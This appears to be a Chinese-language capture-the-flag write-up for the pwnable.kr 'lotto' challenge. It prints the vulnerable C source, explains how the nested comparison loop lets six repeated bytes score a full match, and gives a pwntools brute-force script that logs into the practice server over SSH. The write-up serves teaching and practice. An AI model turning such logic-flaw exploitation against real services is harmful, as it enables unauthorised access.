源码如下:
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> unsigned char submit[6]; void play(){ int i; printf("Submit your 6 lotto bytes : "); fflush(stdout); int r; r = read(0, submit, 6); printf("Lotto Start!\n"); //sleep(1); // generate lotto numbers int fd = open("/dev/urandom", O_RDONLY); if(fd==-1){ printf("error. tell admin\n"); exit(-1); } unsigned char lotto[6]; if(read(fd, lotto, 6) != 6){ printf("error2. tell admin\n"); exit(-1); } for(i=0; i<6; i++){ lotto[i] = (lotto[i] % 45) + 1; // 1 ~ 45 } close(fd); // calculate lotto score int match = 0, j = 0; for(i=0; i<6; i++){ for(j=0; j<6; j++){ if(lotto[i] == submit[j]){ match++; } } } // win! if(match == 6){ system("/bin/cat flag"); } else{ printf("bad luck...\n"); } } void help(){ printf("- nLotto Rule -\n"); printf("nlotto is consisted with 6 random natural numbers less than 46\n"); printf("your goal is to match lotto numbers as many as you can\n"); printf("if you win lottery for *1st place*, you will get reward\n"); printf("for more details, follow the link below\n"); printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n"); printf("mathematical chance to win this game is known to be 1/8145060.\n"); } int main(int argc, char* argv[]){ // menu unsigned int menu; while(1){ printf("- Select Menu -\n"); printf("1. Play Lotto\n"); printf("2. Help\n"); printf("3. Exit\n"); scanf("%d", &menu); switch(menu){ case 1: play(); break; case 2: help(); break; case 3: printf("bye\n"); return 0; default: printf("invalid menu\n"); break; } } return 0; }主要看play()函数,从标准输入中读取6个字符到submit,从/dev/urandom读取6个字符到lotto,然后对lotto的进行处理,使其每个字符的ascii码小于46,然后让lotto与submit进行匹配,如果匹配成功的次数为6时,就能得到flag。
/dev/random和/dev/urandom是Linux系统中提供的随机伪设备,这两个设备的任务,是提供永不为空的随机字节数据流。很多解密程序与安全应用程序(如SSH Keys,SSL Keys等)需要它们提供的随机数据流。
由于lotto是随机产生的,所以想要令submit等于lotto是极其困难的,但是观察到匹配的语句
for(i=0; i<6; i++){ for(j=0; j<6; j++){ if(lotto[i] == submit[j]){ match++; } } }是两个for循环,相等于匹配36次,如果你输入6个一样的字符或者数字,并且lotto中有一个字符能恰好匹配上,也能达到match等于6的目的,也许一次不能够,但是多执行几次肯定能碰出来,毕竟lotto的范围限制在了1~45。脚本如下
from pwn import * context.log_level = 'debug' conn = ssh('lotto','pwnable.kr',2222,'guest') lotto = conn.process('/home/lotto/lotto') while True: lotto.recvuntil('3. Exit') lotto.sendline('1') lotto.recvuntil('Submit your 6 lotto bytes') lotto.sendline('\x01'*6) lotto.recvuntil('bad luck')